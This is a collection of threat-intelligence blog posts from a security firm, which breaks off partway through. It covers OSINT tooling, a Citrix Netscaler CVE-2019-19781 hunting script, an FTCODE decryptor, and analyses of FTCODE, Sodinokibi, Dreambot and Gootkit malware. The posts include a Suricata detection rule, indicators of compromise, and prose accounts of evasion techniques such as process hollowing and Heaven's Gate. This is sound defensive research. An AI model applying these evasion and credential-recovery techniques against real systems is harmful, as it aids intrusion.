Intel Owlis an Open Source Intelligence, or OSINT solution to get threat intelligence data about a specific file, an IP or a domain from a single API at scale. It integrates a number of analyzers available online and is for everyone who needs a single point to query for info about a specific file or observable. Born at the start of 2020 ,(announcement)this fresh and new tool was accepted as part of the Google Summer of Code under the hat of The Honeynet Project. Great improvements have been developed since the start of this project. Now, thanks to the ongoing collaboration with Google Summer of Code and The Honeynet Project, we are excited to announce release 1.0.0, with a completely new and revamped web interface and some new features in our API to help you better manage your threat intelligence data. You can read some more details about Intel Owl 1.0.0 in the official release announcement, co-authored by Eshaan Bansal (GSoC Student) and his mentor, our own Matteo Lodi, and published on The Honeynet Project's blog.

Certego joins the community of contributors to VirusTotal

Matteo Lodi — Mon, 06 Apr 2020 22:00:00 GMT

We are proud to announce that Certego has joined the community of Contributors to VirusTotal, the biggest aggregator of antivirus engines and website scanners.

VirusTotal is a free service that everyone can use to check for virus or threats in a file, URL, domain or IP address by leveraging more than 70 antivirus scanners, blacklisting services and analysis tools provided by the global security vendors. Founded in 2004 by a Spanish company, VirusTotal was acquired by Google in 2012 and, in 2018, the ownership switched to Chronicle, a subsidiary of Alphabet.

Starting from this week, most of the intelligence data generated by Quokka, the Threat Intelligence Platform developed by Certego, is available to the VirusTotal community.

The Quokka platform was designed by a team of experienced malware analysts with passion and a strong commitment. The Threat Intelligence Team has mixed different tools, including Honeypots, real “traps” for the cyber criminals, and Sandboxes, virtual environments where it is possible to execute and study malware automatically and at scale. The result is a platform that enables Certego to gather relevant information in real time to track cyber criminal activities.

Additional technical details

We would like to show some examples of what kind of information users can find by leveraging together the power of VirusTotal multi scan engine and the Certego Intelligence information.

You could be a tech guy or not. In both cases, it surely happened that you found a strange link inside a suspicious email you received and you wanted to verify it before clicking it. One way could be to go to the VirusTotal website, select the URL scan, insert the suspicious link in the input bar and ask for an analysis.

After some seconds, you would find the results of the analysis. For this specific example, the Certego engine detected the URL as containing “Phishing”.

This evaluation helps the end user because, if he had visited the site, he would have found an Outlook account phishing page identical to the real one.

Other than “Phishing”, there are other possible evaluations that can be found after an URL analysis.

The “Malicious” and “Malware” detection are used to notify if a specific URL or domain was observed to serve malware or simply it was involved in cyber crime activities. Example:

The “Suspicious” detection is used to notify when a specific URL or domain is or was probably involved in malicious activities. For these cases, the engine does not have a clear evidence so it just suggests that the site should be avoided as a precaution. Example:

The last case is the “Spam” detection that is used to notify when a specific URL or domain was embedded inside a lot of emails that were sent massively to many inboxes so it is a link that you probably do not want to click. Otherwise, IP addresses are tagged as “Spam” when they have been observed to send a lot of spam, so they are probably related to the presence of a spambot. Example:

netscaler_threathunter.sh

Gabriele Pippi - Threat Research Lead Engineer — Fri, 24 Jan 2020 23:00:00 GMT

Hello everyone, this is Gabriele Pippi, from the Certego Purple Team. Today we are ready to publish the tool we are using to perform digital forensic and incident response on Citrix Netscaler ADC based on FreeBSD.

Our point of view on CVE-2019-19781 exploitation

After the first mad release of the POC for CVE-2019-19781 by the github account @projectzeroindia and first exploitations, trustedsec and other members of the community provided the first details to carry out digital forensic and incident response operations.

Our Incident Response Team from the first engagements has verified the following conditions:

All the Netscaler ADC analyzed run on FreeBSD kernel version. Unlike in FreeBSD core, there were several utilities installed on the machine, such bash2, used for this script.
The code executed remotely with the CVE ran with nobody user, there were no easy privilege escalations and the persistence on the machine was easily circumscribed; we found cronjobs, php webshells and perl scripts.
Some attackers tried to exfiltrate a file called ns.conf, which contains a large number of sensitive information, especially encrypted passwords and hashes. This is an advanced way to exfiltrate ns.conf.

After the first engagements there were some important implications:

The hashes contained in the ns.conf file were already supported and crackable by hashcat since 2014. Reference
Some passwords in the ns.conf are encrypted with AES256-CBC or AES256-ECB algorithms using a well-known key, compiled in a library. These passwords can be decrypted immediately. Among these we also found AD domain admin. https://dozer.nz/citrix-decrypt
The default root password of Citrix Netscaler AMIs is set to the instance ID: this makes trivial a privilege escalation on all installations of this type. Reference
Recently, some actors are starting to exploit this CVE for ransomware campaigns. Reference

Certego Netscaler Threathunter

I developed this bash2 compatible script in order to automate all checks and facilitate threat hunting operations. The script is designed to provide output to an analyst who will then carry out the analysis.

Note #1: we take no responsibility for any improper use of this script. We recommend using it with caution on critical systems in production.

Note #2: except for its optional log file, the script does not perform any writing operations, does not need any installation and can also be launched in fileless mode.

Requirements:

Netscaler running on FreeBSD Kernel Version.
nsroot or root privileges.

Purpose

This script aims to:

validate patch of CVE-2019-19781.
enumerate persistences and artifacts related to CVE-2019-19781.
guide users to change ns.conf credentials to avoid future campaigns and to patch quickly.
spot possible advanced privilege escalation.

For further technical details and to download the script, please refer to the official github project Netscaler_Theathunter.

Author:

Gabriele Pippi - Threat Research Lead Engineer

Certego a ITASEC20 | Ancona, 4-7 febbraio

Pietro Delsante — Tue, 14 Jan 2020 23:00:00 GMT

Certego ha il piacere di sostenere la quarta edizione di ITASEC, la conferenza annuale sulla sicurezza informativa organizzata dal Laboratorio Nazionale di Cybersecurity del CINI – Consorzio Interuniversitario Nazionale per l’Informatica si svolgerà quest’anno ad Ancona dal 4 al 7 febbraio, in collaborazione con l’Università Politecnica delle Marche e l’Università degli Studi di Camerino.

La conferenza, che si svolgerà nelle sale dell’UNIVPM, ha l’obiettivo di riunire ricercatori e professionisti provenienti dal mondo accademico, industriale e governativo per discutere le sfide emergenti e i bisogni consolidati nel campo della cybersecurity. Al filone principale, dedicato alla scienza e tecnologia della sicurezza informatica, si affiancheranno poi workshop e tutorial riservati agli specifici aspetti economici, politici e legali della cybersecurity.

DOVE e QUANDO TROVARCI:

Bernardino Grignaffini, CEO Certego, prenderà parte alla sessione “Nuove Sfide e Opportunità” il giorno 6 febbraio alle ore 9.45

Vendor Session: Certego e VEM organizzeranno due incontri dedicati a Cybersecurity e Industrial Cyber Security nel corso di ITASEC.

Vi segnaliamo che tutte le sessioni plenarie e vendor session sono gratuite, mentre per partecipare ai workshop formativi sarà necessario versare una quota di iscrizione.

L’ultima data utile per iscriversi e partecipare con la QUOTA RIDOTTA è il 22 GENNAIO 2020.

Per maggiori informazioni visita il sito ufficiale dell’evento e PARTECIPA A ITASEC!

DATA

04 Febbraio 2020 - 07 Febbraio 2020

LUOGO

UNIVPM
Via Brecce Bianche
60131 Monte Dago (Ancona)
Italia

New year, new tool: Intel Owl

Matteo Lodi, Threat Intel Team Leader — Wed, 01 Jan 2020 23:00:00 GMT

We would like to open this new decade by releasing a new tool that is called Intel Owl. We hope that it could help the community, in particular those researchers that can not afford commercial solutions, in the generation of threat intelligence data, in a simple, scalable and reliable way.

Main features:

modern Django-Python application: easy to understand and write code upon it

it can get data from multiple sources with a single API request.
40 available analyzers that you can use to generate or retrieve data about a suspicious file or observable (IP, domain, …)
official client available on Github: PyIntelOwl
easily integrable with other tools thanks to the REST API framework and to the PyIntelOwl library.
easily and completely customizable, both the APIs and the analyzers
early compatibility with some of the AWS services. More in the future.
fast and reliable deploy: clone the project, set up the configuration and then you are ready to run it via docker-compose

For more information, we invite you to check the documentation and the code available on GitHub.

Feel free to ask everything it comes to your mind about the project to the author:

Every suggestion or contribution is really appreciated.

Keep hunting malware! We cheer on you :)

FTdecryptor: a simple password-based FTCODE decryptor

Gabriele Pippi, Threat Research Lead Engineer — Wed, 23 Oct 2019 22:00:00 GMT

Hi there, this is Gabriele Pippi, from the Certego Purple Team.

I want to share this simple password-based FTCODE decryptor.

Note #1: this must be considered a beta version of the script; the author assumes no responsibility for any damage caused by running it.
Note #2: currently the malware sends the password both as plain and cypher text; we believe the behavior may change soon as the malware is updated, and the plain text form may not be available anymore.
Note #3: decrypting files with an incorrect password may make them unrecoverable; so, we recommend taking a backup of the files before running the script.

Why should a password-based decryptor be useful?

Since the first observed campaigns, documented in this article, we have noticed that FTCODE was sending the password in plaintext within the body of an HTTP post request to the C&C. Once implemented the relevant Suricata signatures, I decided to develop this tool internally, in order to make the decryption operation feasible. In all of the cases we had the opportunity to put hands on, we were able to recover the encrypted files up to version 1018.1.

Network Traffic

In order to be able to decrypt the files successfully, it is necessary to intercept the contents of the POST request that the malware sends to the C&C at infection time; an example of such request follows:

ext = extension of encrypted files ek = password in plain text r1 = Base64 chunk containing the encrypted password

In order to intercept the POST request, we developed the following Suricata signature, and deployed it to our network monitoring system:

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"CERTEGO TROJAN FTCODE Registration Request (m.bompani)"; 
flow:to_server; content:"POST"; http_method; content:"ext="; 
http_client_body; content:"guid="; 
http_client_body; content:"ek="; http_client_body; classtype:trojan-activity; sid:9000931; rev:1;)

What does the tool do?

Given the extension and the password, the tool is able to recursively decrypt the encrypted files in all the mounted disks or in a given path.

It offers the following features.

In-memory fileless utilization: it is possible by wrapping the script in a function, leveraging the built-in PowerShell cmdlet Invoke-Expression
Logger: it traces the activities carried out, leveraging two cmdlets described at Start/Stop Transcript
Backup: it backs up all the files that the tool will try to decrypt.
Some options were added to the script for possible future uses.

Additional details

For further technical details and demonstrations, please refer to the official github project FTdecryptor

For further FTCODE details, please refer to this article FTCODE article

Author:

Gabriele Pippi, Threat Research Lead Engineer

Malware Tales: FTCODE

Matteo Lodi, Threat Intelligence Lead Engineer; Marco Bompani, Security Analyst — Tue, 01 Oct 2019 22:00:00 GMT

Summary

The Threat
Payload Delivery
Environment Preparation
Ransomware Attack
Version Changes
Conclusion
Suricata IDS Signatures
IoC

1.The Threat

Malicious actors are evolving and trying new ways to infect computers.

At the start of this year, a specific actor started to leverage a legitimate certified mail service, mainly used in Italy, called PEC. This service is particularly trusted by its users and is commonly used to deliver electronic invoices. Therefore, it’s of special interest because it’s easier to lure potential victims with malicious emails that refer to fake invoices.

Until the last week, the Gootkit banker was delivered as the final payload of the infection chain.

During this year, the way to deliver this threat changed: they started to leverage a new simple but effective downloader dubbed as JasperLoader to deliver upgrades and additional modules when needed. Talos research.

However, even if sophisticated, Gootkit is old malware. Also, it does not monetize fast and does require special interaction by the user. So, they have started experimenting with ransomware, maybe to understand if they can get more from this kind of infection.

We are talking about a raw ransomware fully written in Powershell code, called FTCODE.

Even if the name could seem new, the first appearance of this threat was in 2013, as stated by Sophos. Then, almost nothing was seen for about 6 years. Strange, but we have to remember that technology changes. Windows XP was widespread at that time and, by default, Powershell is installed only from Windows 7 on. That can be a problem because actors need to install powershell itself before running ransomware. Also, cyber security was not mature as it is nowadays so, for instance, classic Zeus-like bankers were more effective.

Indeed, last year we saw the arrival of a new downloader and backdoor written in Powershell that was called sLoad and it’s still being actively distributed Certego sLoad analysis.

KISS (“keep it simple and stupid”) they teach you during software engineering courses. So, why strive with sophisticated malware when with a bunch of code written in Powershell you can perform every kind of wickedness?

So let’s dive in more technical details to understand how FTCODE works.

Mainly we analyzed two samples from two different campaigns:

version 930.5, md5: a5af9f4b875be92a79085bb03c46fe5c, day: 01/10/2019
version 1001.7, md5: 8d4c81e06b54436160886d78a1fb5c38, day 02/10/2019

2.Payload Delivery

As stated before, the user receives an email that refers to a fake invoice with an attached document called "Fattura-2019-951692.doc". The threat actor leverages a commonly used template to trick the user to disable the “Protected View” mode and to trigger the execution of the malicious macro.

Once enabled, the macro runs and spawns the following Powershell process:

The result is the download of a piece of Powershell code that is run using the "Invoke-Expression" command (“iex”). Note that the function “DownloadString” saves the result of the request only in memory, in an attempt to avoid antivirus detection.

The new Powershell code is FTCODE itself. On execution, it performs the following GET request:

to download a Visual Basic Script file and save it in "C:\Users\Public\Libraries\WindowsIndexingService.vbs".

This is a variant of JasperLoader, a simple backdoor that is able to download further payloads.

Then, it tries to create a shortcut file called "WindowsIndexingService.lnk" in the user's startup folder that runs the JasperLoader. Finally, to achieve persistence after reboot, it creates a scheduled task called "WindowsApplicationService" pointing to the shortcut file.

3.Environment Preparation

After having installed the JasperLoader backdoor, FTCODE starts to prepare the environment for the ransomware attack.

It verifies if the file "C:\Users\Public\OracleKit\w00log03.tmp" exists. If yes, it would check the presence of some files with the extension ".FTCODE" in all the drives with at least a free space of 50 KB. If there are some, it means that the machine was already attacked by the ransomware, maybe by a previous version: therefore, it would exit.

De facto, this indicator can be used to “vaccinate” the endpoints from this threat. It’s enough to create the mentioned file with any kind of content to let FTCODE believe that the computer was already infected.

Afterwards it generates a random globally unique identifier (GUID) and a password consisting of 50 characters with at least 4 non-alphanumeric characters.

Then we found a hardcoded RSA public key that is used to encrypt the password. In this way the password cannot be deciphered without the proper private key controlled by the malicious actor and can be sent, in a secure way, to the attacker’s server.

Surprisingly, the encrypted password, after being generated, is never used elsewhere in the code and, instead, is just sent the basic base64-encoded password to the attacker’s server.

The consequence is that, if the traffic against the attacker’s server is being monitored, it’s possible to retrieve the key that will be used to decipher the files, without paying any ransom.

We believe that this mistake will be corrected in future versions.

After that error, FTCODE performs a POST request to the following URL:

ver=930.5, version number
vid=dpec2, probably to identify the campaign
psver=Powershell Major Version, probably to understand if FTCODE needs an update from JasperLoader
guid=the GUID generated previously, to identify the victim
ek=the previously generated password encoded in base64
if the server response is "ok", it creates the file "C:\Users\Public\OracleKit\w00log03.tmp" containing the GUID. If the server response is different, it would exit. This is another protection mechanism to evade execution in simulated environments.

Afterwards, it tries to run the following commands that are commonly used by almost every ransomware to avoid the chance that the victim can recover the encrypted files without paying:

Similar behaviour is performed by Sodinokibi: Certego blog

4.Ransomware Attack

At this moment, everything is ready to perform the real attack phase.

FTCODE checks for all the drives with at least 50 KB of free space and it looks for all the files with the following extensions:

Then, it encrypts the first 40960 bytes of each of them using the “Rijndael symmetric key encryption”. The key is created based on the previous generated key and the hardcoded string “BXCODE hack your system”. The initialization vector is also based on another hardcoded string ("BXCODE INIT").

Finally it appends the extension ".FTCODE" and creates the file "READ_ME_NOW.htm" in the folders that contain the encrypted files. We are talking about the classic ransom note with instructions on how to recover the encrypted file.

5.Version Changes

We believe that this ransomware is in active development. Just one day after the delivery of the version 930.5, we saw another version distributed (1001.7). Malware authors noticed that, in the first version, there was no mechanism to tell the threat actors if the file encryption was successful or not. So, they added other 2 lines of code that trigger other 2 C&C POST requests with the following new parameters:

status=”start” or “done”
res=number of successfully encrypted files

6.Conclusion

Actors change their tactics faster and faster. But we understood that they could be lazy and they can make mistakes too. They are humans after all.

Some of them are starting to prefer ransomware like FTCODE over classic infostealers and bankers.

Also, we found that, monitoring the network traffic, it’s possible to retrieve they key used to encrypt the files.

So, it’s important to continuously monitor your own assets, both on a network and an endpoint level, to fight against these kind of threats.

Certego Threat Intelligence Team has been studying upcoming cyber threats for years in order to provide the best protection to their customers.

7.Suricata IDS Signatures

8.IoC

Author

Matteo Lodi, Threat Intelligence Lead Engineer; Marco Bompani, Security Analyst

Malware Tales: Sodinokibi

Matteo Lodi, Threat Intelligence Team Leader — Thu, 13 Jun 2019 22:00:00 GMT

Hi everyone! Today we are looking at a threat that appeared recently: a new ransomware called Sodinokibi.

Summary

The Threat
The Loader
Mutex and Configuration
Machine information recovery
Encryption preparation inspired by GandCrab
Ransomware attack
C2 Registration
Conclusion

1.The Threat

The first noteworthy appearance was at the end of April (Talos Research).

Then, at the start of this month, we gathered different reports of this threat being spread in Italy (eg: JAMESWT_MHT's tweet), both via malspam and known server vulnerabilities.
Also, there was the announcement of the shutdown of the GandCrab Operation Bleeping Computer, just some days earlier.

Coincidence? We’ll see.

Our guess is that this new payload could be used as a replacement of GandCrab in the RAAS (Ransomware-as-a-service) panorama.

Therefore, in order to protect our customers effectively, we went deep into the analysis of this ransomware.

Mainly we analyzed two different samples:

version 1.01: md5: e713658b666ff04c9863ebecb458f174
version 1.00: md5: bf9359046c4f5c24de0a9de28bbabd14

2.The Loader

Like every malware who deserves respect, Sodinokibi is protected by a custom packer that is different for each sample.

The method used by the version 1.01 sample to reconstruct the original payload is called “PE overwrite”.

To perform this technique, the malicious software must allocate a new area inside its process memory and fill it with the code that has the duty to overwrite the mapped image of the original file with the real malware payload. In this case, first the process allocates space in the Heap via LocalAlloc, then it writes the “unpacking stub” code, it signs that space as executable with VirtualProtect and finally it redirects the execution flow to the new memory space

In order to slow the analysis, the loader contains a lot of junk code that will be never executed.

Also, in the following image, we can see that it tries to hide some important strings from the static analysis like “ kernel32.dll”. It leverages “stack strings” plus the randomization of the order of the characters.

At this point, the unpacking stub resolves dynamically the functions that he needs like VirtualAlloc. Then it performs the overwrite of the original image base with the new decrypted payload.

Finally, it transfers the execution to the OEP (Original Entry Point) of the unpacked Sodinokibi payload.

3.Mutex and Configuration

Once unpacked, the sample tries to create a mutex object. It calls CreateMutexW, then, if there was an error, with RtlGetLastWin32Error it would extract the generated error. Indeed, if the mutex already existed, the error would have been “0xB7” ("ERROR_ALREADY_EXISTS" ref docs ). In that case a function is called that terminates the process.

We found that the mutex name is different for each sample but following this pattern: “Global{UUID}”. Therefore it’s a method to detect the malware or to vaccinate the endpoint (Zeltser blog) that is reliable only for a specific sample.

Going forward, we found the configuration in an encrypted form in the section “ .zeacl” for v.1.01 or “.grrr” for v.1.00. Once extracted, we noticed that it’s a JSON file.

These are the keys found in the configuration.

“pk” -> base64 encoded key used to encrypt files
“pid” -> personal id of the actor
“sub” -> another id, maybe related to the specific campaign
“dbg” -> debug mode
“fast” -> fast mode
“wipe” -> enable wipe of specific directories
“wht” -> whitelist dictionary
“fld” -> keyword in whitelisted directories
“fls” -> whitelisted filenames
“ext” -> whitelisted file extensions
“wfld” -> directories to wipe
“prc” -> processes to kill before the encryption
“dmn” -> domains to contact after encryption
“net” -> check network resources
“nbody” -> base64 encoded ransom note body
“nname” -> ransom note file name
“exp” -> unknown, expert mode?
“img” -> base64 encoded message on desktop background

If you are interested in manually checking the configuration files we have extracted in the samples we have analyzed, follow this link and download the archive (password:sodinokibi): sodinokibi_config_files.zip

4.Machine information recovery

Afterwards, Sodinokibi starts to gather information about the infected machine and builds another JSON structure that stores in an encrypted form in the “HKEY_LOCAL_MACHINE\SOFTWARE\recfg\stat” registry key.

Keys:

“ver”: version (100 or 101)
“pid”: previous config “pid”
“sub”: previous config “sub”
“pk”: previous config “pk”
“uid”: user ID. It’s a 8 byte hexadecimal value generated with XOR encryption. First 4 bytes are created from the processor name, while the others are created from the volume serial number extracted with a “GetVolumeInformationW” API call.

“sk”: secondary key, base64 encoded key generated at runtime
“unm”: username
“net” : hostname
“grp”: windows domain

“lng”: language

“bro”: brother? Sodinokibi retrieves the keyboard language with GetKeyboardLayoutList. Then it implements an algorithm that gives “True” as value for this key only if the nation code ends with a byte between 0x18 and 0x2c. It’s not odd that inside this range there are the majority of the East-Europe language codes, like Russian, Cyrillic and Romanian. It’s a clear indication of the origin of the malware authors.

“os”: full OS name

“bit”: Sodinokibi extracts this value from “GetNativeSystemInfo” then it compares with 9 that corresponds to the x64 architecture. Further processing will generate “40” if the architecture is 64bit, “56” otherwise.

“dsk”: base64 encoded value generated based on the drives found on the machine.
“ext”: new in 1.01. The random extension used for encrypted files.

5.Encryption preparation inspired by GandCrab

At this time, before performing the encryption, Sodinokibi replicates a behavior that is very similar to what GandCrab performs, suggesting that Sodinokibi authors learned from GandCrab ones or that they are strictly related.

Sodinokibi extracts the running processes with the combination of CreateToolhelp32Snapshot, Process32First and Process32First and checks if they match the names in the configuration. In that case, those processes are killed. The reason is that these programs could hold write access on files and therefore they could not allow the ransomware to encrypt them.

The list of the version 1.00 contains only the “mysql.exe” process, while the list of the version 1.01 is a lot longer and almost matches the ones used by GandCrab (source: Symantec ).

Another check done by the ransomware is for available network resources with WNetOpenEnumW e WNetEnumResourceW with the aim to find other files to encrypt.

Last operation before the encryption is to find all the directories with a name that matches the configuration key “wfld” and to wipe them. In this case, the list contains only “backup”. So, for example, Sodinokibi deletes Windows Defenders updates backups.

6.Ransomware attack

Finally (or not?) Sodinokibi starts to iterate over the available directories with FindFirstFile and FindNextFile.

It skips files and directories that match conditions on the whitelist configuration. The others are encrypted by the ransomware that adds the random generated key as extension to the name.

In each directory the malware also write the ransom note “{ext}.readme.txt” extracted from the configuration and a lock file.

Then it creates a file with a random name “{random}.bmp” in the %TEMP% which contains the image that will be put as a background with the help of DrawTextW and FillRect functions.

7.C2 Registration

Once the encryption is finished, Sodinokibi starts to iterate through a giant list of domains hardcoded in the configuration (about 1k). These domains are the same across the samples we analyzed but they are ordered differently in order to mislead the analysis.

At a first glance, these domains seem legit and most of them are correctly registered.

This is not a classic DGA but the result is almost the same because the purpose is to hide the real C&C Server used by cyber criminals.

For each domain listed, Sodinokibi generates a random URI. Then it uses the winhttp.dll library functions to perform HTTPS POST requests with the created URLs.

The data sent with the POST request is an encrypted form of the JSON configuration saved on the “HKEY_LOCAL_MACHINE\SOFTWARE\recfg\stat” registry key and described on the “Machine information recovery” section. In this way, malicious actors can collect important information of the infected machine.

The following are examples of some of these URLs:

Looking at an analysis of this sample in a sandbox (AnyRun), we noticed that HTTPS requests where not correctly listed. The malware can avoid traffic interception by proxies like Fiddler or Mitmproxy that are used for manual or automatic analysis.

I suggest to read the following blog post where it’s further explained how these URLs are generated and why also this routine is inspired by GandCrab code: Tesorion analysis

8.Conclusion

Sodinokibi could be the heir of GandCrab. It’s still at version 1.01 so maybe it’s not mature yet but is actively developed and updated

Malicious actors have started to use Sodinokibi to generate profit, even in Italy.

It’s important to continuously monitor your own assets, both on a network and an endpoint level, to fight against these kind of threats.

Certego Threat Intelligence Team has been studying upcoming cyber threats for years in order to provide the best protection to their customers.

IOC

HKEY_LOCAL_MACHINE\SOFTWARE\recfg\pk_key
decryptor[.]top
aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd[.]onion

Author:

Matteo Lodi, Threat Intelligence Team Leader

Malware Tales: Dreambot

Matteo Lodi, Threat Intelligence Team Leader — Mon, 15 Apr 2019 22:00:00 GMT

Today we are going to talk about one of the biggest threats that is spreading in these days, in particular in Italy: Dreambot, the most recent version of a malware also known as Ursnif, or Gozi.

Summary

The Threat
The Check-In phase
Encryption routine
Injected Internet Explorer? Or not?
Conclusion

1.The Threat

Ursnif belongs to the category of Infostealers. It was already analyzed by a lot of skilled researchers. I list just some of the best analysis you could find:

In this article, we'll focus on the initial communication with the Command & Control infrastructure.

2.The Check-In phase

At the time of the compilation of the malware, spreaders can choose a list of domains that will be hardcoded in the sample in an encrypted form.

For example, the following image shows 3 different domains uploaded into the memory of one of the variant that we analyzed.

The malicious agent tries to perform its initial communication with the first of the list, then, if it fails, it would try with the next and so on.

We underline that this "beacon" is always performed via plain HTTP while the following steps of communication are done via SSL encryption and custom certificates.

This is important because, with the right eye, even without SSL interception, we can pretty easily spot if something is going wrong.

The following image shows 3 different attempts to communicate with the C2 server in a sandbox environment.

If the pattern is not known, an untrained analyst could be misleaded by this behaviour while performing threat hunting on network logs or artifacts.

The file extension ".avi" refers to video files. Also, the path "/images/" is deceptive. In addition, it's performed as a "GET" request. All of this evidence could be seen as a normal download of a video file from a site hosting media. In fact it's the check-in of the malware that is sending basic information about the compromised machine, hiding them in plain sight in the URI path.

Example:

Decoded data:

fjidtflrb -> junk param, always present at the start of the URI to generate randomness (and always different)
soft -> major version
version -> minor version
user -> unique user id
server -> unique c2 server id
id -> bot group id
crc -> payload to retrieve (1-DLL 32bit, 2-DLL64 bit, 3-ps1)
uptime -> time elapsed from initial infection (seconds)

The following image represents the phase when the malware creates the first parameter:

After having seen a lot of this kind of patterns on Ursnif samples in last years, I decided to create a simple and raw tool that is able to decrypt the URL created by the malware on the fly.

In this way it's possible to spy the configuration sent to the Command & Control server and, at the same time, to check if the URL is related to this threat.

All of this without any need of manual reverse engineering.

You can check the simple tool that I created on the following link on: GitHub

This is an example of how to run the script:

and the related output:

3.Encryption routine

The custom algorithm starts with a symmetric encryption that leverages the Serpent cipher in CBC mode and a null IV (initialization vector).

Afterwards the result is encoded with a classic base64. Considering that base64 encoding is pretty easy to spot, malware authors decided to change things a little more. They removed padding characters("=") and substituted the other special characters ("+", "/") with the relative ASCII code, after having prepended them by an underscore ("_2f", "_2b"). The last tweak is to add slashes at specified offsets to let the URI to appear like a real one.

Obviously, the Serpent encryption needs a key. We can find it hardcoded on the malware sample. Some code level analysis could be required to get that info.

However, observations led to the fact that the key is usually shared among a lot of samples and rarely changed.

If you don't have one, just run the script: it would try a predefined list of known keys for you.

It's really appreciated if you want to share new keys that you find with us. Feel free to contact us on Twitter or LinkedIn

4.Injected Internet Explorer? Or not?

While investigating the check-in phase, we noticed an unusual fact that we think it's worth to mention.

As you can see from the analysis of AnyRun , the malicious beacon seems to be sent by an Internet Explorer instance after the malware has run.

Considering that Ursnif is known to perform injection on browsers to steal information, an unaware analyst could think that the malware already decided to perform some form of memory injection into a new spawned instance of Internet Explorer to masquerade the communication as a legit one.

However this is unecessary. It's enough to use the COM (Wikipedia) library that is provided by Microsoft. Looking at the code, we can detect this behaviour with the finding of the function CoCreateInstance that were made just before the network communication.

This one is a stealthy way that could mislead both analysts and security products if it has not been taken in consideration.

If you like to have a more detailed explanation on COM and, in general, on how to detect malware C2 communications while reverse engineering, I suggest the following reading: FireEye Blog

5.Conclusions

Ursnif has been trying for years to make analysis difficult for people and detection for security products.

We went deep into the communication performed during the check-in phase and created a new tool to help to analyze and detect the malware.

Certego is actively monitoring every day threats to improve its detection and response methods, continuously increasing the effectiveness of the incident response workflow.

Hash

8793af5f5ad8a2ca9b2ae6af5e70e63f
8f0195472ede691b129913465eec0c9e

If you know something more about protocols used by Ursnif for C2 communications or if you'd like to improve the tool(GitHub), feel free to contact me at any time.

Author:

Matteo Lodi, Threat Intelligence Team Leader

Malware Tales: Gootkit

Matteo Lodi, Threat Intelligence Lead Engineer — Wed, 13 Feb 2019 23:00:00 GMT

Summary

The Threat
Payload Delivery
Gootkit executable
Stage 1: Packed Gootkit
Stage 2: Gaining a foothold
Stage 3: Check-in phase
Last stage
Additional findings
Conclusions

1.The Threat

Gootkit belongs to the category of Infostealers and Bankers therefore it aims to steal information available on infected machines and to hijack bank accounts to perform unwanted transactions.

It has been around at least since 2014 and it seems being actively distributed in many countries, including Italy.

Previous reports about this threat can be found following this link: Malpedia

Today we are going to dive into the analysis of a particular variant that came up the last week.

2.Payload Delivery

The infection vector is an email written in Italian. In this case adversaries used one of the most common social engineering techniques to trigger the user to open the attachment

The downloaded file is a heavily obfuscated Javascript file called "GLS_Notifica.js". If the user opens it, the native Javascript interpreter wscript.exe would be executed by default and it would perform the following HTTP request:

The result is the download of a cabinet file that is an archive file which can be extracted natively by Windows. Inside there is a Portable Executable file that is saved into the %TEMP% folder (“C:\Users<username>\AppData\Local\Temp”) and launched.

Javascripts downloaders are a common payload delivery because a little obfuscation can be enough to make them very difficult to be detected by antivirus engines.

3.Gootkit executable

First run of the sample in an automated environment revealed that something new was added in this version. As we can see in the following images, malware authors added a new layer of protection to the malicious agent. The comparison has been made with a variant spread during December of 2018 in Italy. images are from AnyRun

This means that the original program was “packed” with the aim to slow down reverse engineers and to make ineffective static analysis tools like Yara rules.

4.Stage 1: Packed Gootkit

In such cases, a malware analyst knows that he has to extract the original payload as fast as possible without losing time to try to understand the inner workings of this stage.

A great open-source tool exists which can resolve the problem in a matter of seconds. It’s called PE-Sieve GitHub. Even though it does not always work, in this case it can dump the unmapped version of the original executable because the malicious software uses a technique called Process Hollowing a.k.a. RunPE. This method consists in starting a new process in a suspended state, “hollowing” out the content of the process, replacing it with malicious code and, finally, resuming the thread.

In the image we can see that the 6th parameter of "CreateProcessW" was set to "4", indicating that the process will start in a suspended state.

We are talking about a well known technique that is easily detectable with the monitoring of the Windows API calls that are needed to perform the injection. But here comes the trick.

Following the flow of execution we couldn’t find all the needed API calls: we got NtCreateProcess, NtGetContextThread, NtReadVirtualMemory and NtSetContextThread.

The most important ones that are used by monitoring applications to detect the technique were missing:

NtUnmapViewOfSection to “hollow” the target process
NtWriteVirtualMemory to write into the target process
NtResumeThread to resume the suspended thread

Let’s find out what’s happening!

After some shellcode injections inside its memory space, the process executes a call to IsWow64Process API that is used by the application to understand if the process is running under the WOW64 environment (Wiki) : this is a subsystem of the Windows OS that is able to run 32-bit applications, like this one, on 64-bit operating systems.

The result of this check is used to run two different paths of code but with the same scope: run one of the aforementioned missing API calls in the Kernel mode. This means that, in this way, classic user-level monitoring tools would not catch these calls and the RunPE technique would remain unnoticed.

Specifically, in case the process is running in a 32-bit environment, it would use the SYSENTER command to switch into the Kernel mode, while, on the contrary, it would use the SYSCALL command to perform the same operation.

To complicate even further, the SYSCALL command can’t be called in the context of a 32-bit application. This means that the executable needs to perform a “trick-into-the-trick” to execute this operation. We are talking about a technique known as The Heaven’s Gate.

Practically, thanks to the RETF instruction, it’s possible to change the code segment (CS) from 0x23 to 0x33, de facto enabling 64-bit mode on the running process.

In the following image we highlight the entrance and the exit of the “Gate” which contains the 64-bit code that performs the SYSCALL operation.

Instead, in this other image, we can see the process status before opening the gate (grey=suspended process) and after having closed it (orange=running process).

Also, Gootkit takes advantage of The Heaven’s Gate as an anti-debugging technique because the majority of commonly used debuggers can’t properly handle this situation, not allowing the analyst to follow the code of the Gate step-by-step.

For further details, this method was deeply explained in this blog MalwareBytes

Going back to the point, the first stage resulted more complicated than expected because it pushed over the limits of obfuscation and stealthiness with the combination of various techniques.

5.Stage 2: Gaining a foothold

At this point we can proceed with the analysis of the unpacked Gootkit.

The very first considerable finding was the check for the existence of a mutex object named “ServiceEntryPointThread”. If it exists, the process would terminate itself.

But how mutexes works? Mutexes are used as a locking mechanism to serialize access to a resource on the system. Malware sometimes uses it as an “infection marker” to avoid to infect the same machine twice. The fascinating thing about mutexes is that they are a double-edged weapon: security analysts could install the mutex in advance to vaccinate endpoint. (ref: Zeltser blog).

This means that this is a great indicator of compromise that we can use not only to detect the infection but also to prevent it.

Moving on, we found that malware authors implemented a lot of checks to understand if the malware is running inside a virtual environment. Some of them are:

